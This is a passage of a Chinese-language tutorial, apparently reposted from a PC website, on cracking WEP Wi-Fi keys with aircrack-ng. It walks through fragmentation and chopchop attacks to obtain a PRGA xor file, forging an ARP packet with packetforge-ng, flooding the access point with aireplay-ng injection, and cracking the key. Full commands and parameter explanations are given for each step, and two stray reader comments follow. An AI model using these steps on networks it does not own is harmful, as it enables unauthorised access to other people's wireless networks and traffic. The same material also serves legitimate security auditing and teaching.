成功后如上图截获了一个可以直接进行注入的数据包,并回显Use this packet,按y 然后开始
发包攻击,date飞快涨。当获得足够的ivs以后就可破解了。
2.第二种破解方式:
思路:1-7步同上
第八步:利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件)
第九步:然后通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包,
第十步:最后利用交互式攻击模式-2发包攻击。
第八步:采用碎片包攻击模式-5,获得一个PRGA数据包(xor文件)。
输入aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
如顺利,将得到一个可利用的数据包如上图,系统将回显 Use this packet ? 输入y 回车,将得到一个至
关重要的xor 文件。
再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。
第九步:用数据包制造程序packetforge-ng将上面获得的xor 数据包伪造成可利用的ARP注入包。
输入packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 –l 255.255.255.255 -y
name-xor -w myarp
参数说明:
-y (filename)是用来读取PRGA的文件
-w (filename)将arp包写入文件,我用的文件名是myarp
系统回显:Wrote packet to: mrarp
第十步:采用交互模式-2,发包注入攻击。
输入aireplay-ng -2 –r myarp -x 256 rausb0
-y
【-r】:从指定文件中读取arp数据包 【-x】:定义每秒发送的数据包数量。为避免网卡死机,可选择256,最高不超过1024 输入y 回车 攻击开始 这时,前面的抓包窗口上的data 将迅速增加。 到数据增加到1.5万以上时。 第十一步:采用aircrack-ng 来进行破解 3.第三种破解方式: 思路:1-7步同上 第八步:利用-4的Chopchop 攻击模式获得一个可用的包含密钥数据文件(xor 文件) 第九步:通过数据包制造程序Packetforge-ng提取xor 文件中的PRGA伪造一个arp包 第十步:最后利用交互式攻击模式-2发包攻击。 第八步:采用-4 的Chopchop 攻击模式获得一个包含密钥数据的xor 文件 输入aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 参数说明: -b:设置需要破解的AP的mac -h:设置用于连接的无线网卡的mac(自己网卡) 顺利将得到一个可利用的数据包,按y 将利用此数据包生产一个xor 文件 如上图所示得到一个名为replay_dec-0523-075615的xor 文件, 第九步:通过数据包制造程序Packetforge-ng提取上面xor 文件来伪造一个arp包 输入packetforge-ng -0 -a <ap mac> -h <my mac> -k 255.255.255.255 –l 255.255.255.255 name-xor -w myarp
如上图,成功生成一个名为myarp的可用来注入的arp数据包。
第十步:最后利用交互式攻击模式-2发包攻击。
输入aireplay-ng -2 -r myarp rausb0
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/ruanjian/article-53606-3.html
我只能呵呵了
支持台湾人民